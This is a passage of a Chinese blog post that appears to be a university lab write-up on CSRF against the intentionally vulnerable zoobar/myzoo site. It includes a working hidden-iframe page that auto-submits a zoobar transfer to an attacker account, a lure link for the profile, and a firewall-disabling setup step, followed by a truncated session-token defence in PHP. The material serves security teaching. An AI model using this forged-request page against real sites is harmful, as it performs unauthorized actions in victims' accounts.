信息安全实践Lab3-CSRF&XSS&Click Jacking

最新推荐文章于 2021-01-28 20:59:20 发布
最新推荐文章于 2021-01-28 20:59:20 发布
阅读量3.3k 收藏 10
点赞数 11
分类专栏: 信息安全实践 文章标签: php 信息安全 web csrf xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deadly_97/article/details/112211491
版权

信息安全实践Lab3-CSRF&XSS&Click Jacking

该实验可以在一台虚拟机上完成,本文采用两台虚拟机的方式,myzoo网站所在虚拟机ip:10.211.55.14 , 攻击者网站所在虚拟机ip:10.211.55.16 。

CSRF

在zoobar网站上展示并防御CSRF攻击。请注意在防御时的粒度问题,防止所有人的token都一样;以及刷新太快,正常操作都失败。

配置

先在myzoo网站注册两个账号 victim和csrfattack。

攻击者服务器所在虚拟机配置(10.211.55.16):

1.安装apache2

sudo apt-get install apache2

2.关闭防火墙

sudo ufw disable

3.配置hosts

sudo vim /etc/hosts
在最后添加 
10.211.55.14  www.myzoo.com  #这里的ip填写myzoo服务器的ip地址
127.0.0.1 www.attack.com

4.编写index.html文件

sudo cd /var/www/html
sudo vim index.html
将下面的内容复制进去即可

index.html

<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/>
    <title>my profile</title>
</head>

<body>
<iframe name="it" style="display:none" width="600px" height="450px"></iframe>

<form method="POST"
      name="transferform"
      action="http://www.myzoo.com/transfer.php"
      target="it"
      id="transferform"
      style="display:none">

    <input name="zoobars" type="text" value="1" size="5">
    <input name="recipient" type="text" value="csrfattack"> 
    <input type="hidden" name="submission" value="Send">
</form>

<img src="http://106.13.136.87:8080/101.jpeg">

<script type="text/javascript">
    form = document.getElementById("transferform");
    form.submit();
</script>

</body>
</html>

myzoo网站所在虚拟机配置(10.211.55.14):

1.关闭防火墙

sudo ufw disable

2.配置hosts

sudo vim /etc/hosts
在最后添加 
127.0.0.1  www.myzoo.com
10.211.55.16 www.attack.com #这里的ip填写攻击者服务器的ip地址

攻击

1.在csrfattack账号的profile中写入:

<a href="http://www.attack.com"> 点击查看我的照片哦</a>

然后点击save。

2.在10.211.55.14上登录victim账户,victim用户去查看csrfattack的profile

在这里插入图片描述

当victim点击该链接后,就会向csrfattack转1个zoobars。

防御

方法1:使用session

修改transfer.php文件:

1.在开头加入下面的内容

<?php
  session_start();
?>

2.修改if语句

if($_POST['submission'] && $_POST['token'] == $_SESSION['csrf'])

3.在45-47行加入下面内容

<?php
  $_SESSION['csrf'] = md5(uniqid(mt_rand(), true));
?>

4.在form中添加下面的内容

<input type=hidden name=token value="<?php echo $_SESSION['csrf']?>"/>

修改后的transfer.php如下:

<?php
  session_start();
?>

<?php 
  require_once("includes/common.php"); 
  nav_start_outer("Transfer");
  nav_start_inner();
 //if($_POST[&#
最低0.47元/天 解锁文章
「已注销」
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
信息安全实践CSRF & XSS & Click Jacking
m_pNext的博客
01-07 247
s
安全|跨站请求伪造(CSRF)——攻击实现与防御的代码实现【ustc-web信息安全实践课程实验三】
m0_37714470的博客
12-23 1227
实验要求:在zoobar网站上展示并防御CSRF攻击。请注意在防御时的粒度问题,防止所有人的token都一样;以及刷新太快,正常操作都失败。 一、实现CSRF攻击 前提: 我的myzoo网站的存储目录是:/home/web/myzoo 【大多数人的应该是/var/www/myzoo】 (一)攻击站点建立 1、在/home/web下建立html/csrf1.html,在csrf1.html完成攻击...
信息安全实践-Lab3 CSRF & XSS
sage_wang的博客
12-26 1万+
CSRF & XSS 攻击及防御
信息安全CSRF
绣花针
03-19 341
目录 一、简介 二、案例 三、防范 1.CSRF Token验证 2.人机交互 一、简介 跨站点请求伪造(Cross-Site Request Forgery),CSRF攻击者在用户已经登录目标网站之后,诱使用户访问一个攻击页面,利用目标网站对用户的信任,以用户身份在攻击页面对目标网站发起伪造用户操作的请求,如恶意发帖、修改密码、发邮件等,达到攻击目的。 CSRF有别于XSS,...
信息安全实验——点击劫持技术
qq_24293765的博客
01-28 2405
点击劫持技术 概念:又称界面伪装攻击(ui redress attack),是一种视觉上的欺骗手段,攻击者使用一个或多个透明的iframe覆盖在一个正常的网页上,然后诱使用户在该网页上进行操作,当用户在不知情的情况下点击透明的iframe页面时,用户的操作已经被劫持到攻击者事先设计好的恶意按钮或链接上。 方式:攻击者既可以通过点击劫持设计一个独立的恶意网站,执行钓鱼攻击等;也可以与XSSCSRF攻击相结合,突破传统的防御措施,提升漏洞的危害程度。 点击劫持攻击实现 实施攻击的一般步骤 黑客创建一个网页,
Web高级知识-跨域&XSS;&CSRF;解决方案
11-26
IP协议负责网络中的路由和寻址,而TCP协议则...同时,掌握跨域、XSSCSRF的防范策略,是保障Web应用程序安全的基础。在实际开发中,应根据应用场景选择合适的连接方式,并严格实施安全措施,保护用户数据和系统安全
安全性测试--CSRF攻击
02-26
CSRF(Cross-siterequestforgery),中文名称:跨站请求伪造,也被称为:oneclickattack/sessionriding,缩写为:CSRF/XSRF。你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做...
Web安全的三个XSS-CSRF-CLICK攻防姿
11-01
Web安全的三个XSS-CSRF-CLICK攻防姿Web安全的三个XSS-CSRF-CLICK攻防姿
next-csrf:Next.js的CSRF缓解
05-14
next-csrf Next.js的CSRF缓解。 特征 next-csrf实现的缓解模式: 使用 (另请 ) 安装 含纱线: yarn add next-csrf 使用npm: npm i next-csrf --save 用法 设置: // file: lib/csrf.js import { nextCsrf } ...
Web安全第三次实验(CSRF,XSS,点击劫持).rar
12-26
文件中包含myzoo,csrf.html,xss.txt,hijack.html.其中myzoo是测试网站,csrf需要在测试网站中的profile中设置超链接,xss攻击则直接可以将xss.txt内容复制到profile中,点击劫持也是需要设置超链接。
关于XSSCSRF
weixin_33979363的博客
01-06 82
为什么80%的码农都做不了架构师?>>> ...
网络安全CSRF攻击
wangqianqianya的博客
03-12 316
CSRF cross site request forgery,跨站域请求伪造。 攻击形式 如陌生人给你发qq消息带有链接,点击之后即遭受攻击,你的qq会在你未知的情况下自动向他人或空间中发布小广告等其它攻击者让你发的信息。 cookie cookie是客户在访问web服务器时,服务器在客户磁盘上存放的鉴别用户的信息。 原理 当用户访问正常的网站A时,网站A会...
信息安全实践-Lab4 Click Jacking
sage_wang的博客
01-03 6976
Clickjacking(点击劫持)是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼在2008年提出的。是一种视觉欺骗手段,在web端就是iframe嵌套一个透明不可见的页面,让用户在不知情的情况下,点击攻击者想要欺骗用户点击的位置。” 一、什么是点击劫持?   点击劫持 (Clickjacking) 技术又称为界面伪装攻击 (UI redress attack ),是一种视觉上的欺骗
SEED Labs信息安全实验
红蓝联盟的博客
07-04 1万+
1.1  SEED Labs 介绍    SEED Labs是一套完整的信息安全实验,涵盖本科信息安全教学中的大部分基本原理,可用于提高学生体验式学习的实验室练习。项目组2002年由杜文亮教授创建,目前开发了30个实验,涵盖了各种计算机安全概念,原理和实践,几百所大学已采用。实验楼翻译制作的SEEDLabs在线实验课永久免费并开源。    SEED Labs网站:http://www.cis.sy...
web安全之点击劫持(clickjacking)
热门推荐
infi
03-19 1万+
百度解释: 点击劫持,clickjacking,也被称为UI-覆盖攻击。这个词首次出现在2008年,是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼首创的。 它是通过覆盖不可见的框架误导受害者点击。 虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。 这种攻击利用了HTML中标签的透明属性。 就像一张图片上
信安实践——CSRF攻击与防御
weixin_30505751的博客
12-30 444
1.实验原理 CSRF(Cross-Site Request Forgery,跨站点伪造请求)是一种网络攻击方式,该攻击可以在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻击站点,从而在未授权的情况下执行在权限保护之下的操作,具有很大的危害性。具体来讲,可以这样理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操...
2017-2018-1 20155330 《信息安全系统设计基础》第六周课堂实践
weixin_30423977的博客
10-29 145
2017-2018-1 20155330 《信息安全系统设计基础》第六周课堂实践 第六周课上测试-5-ch03 通过输入gcc -S -o main.s main.c 将下面c程序”week0603学号.c“编译成汇编代码 int g(int x){ return x+3; } int f(int x){ int i = 学号后两位; return g(x)+i; } in...
***场景篇--当XSS遇上CSRF
weixin_34303897的博客
03-14 205
你是否有过这样的经历,你发现了一个xss,但是貌似只能叉自己,输出点只有自己可以看见。这个时候,你会觉得这个xss很鸡肋,当你就此忽略这个漏洞的时候,你可能丢掉一个发出组合技能的机会。 今天我们来介绍一个场景,当xss遇上csrf的时候,是否能打出一套漂亮的组合技能。实验环境: ZvulDirll[请用下面我简单修改过的版本] 下载地址:在文章最...
跨站攻击(XSS+CSRF).docx
最新发布
01-05
"本次实验主要关注的是Web安全中...在进行此类实验时,重要的是要确保遵循安全实践,仅在受控环境中进行测试,以避免对真实系统的潜在危害。同时,通过学习如何防御这些攻击,可以提高Web应用的安全性,保护用户数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值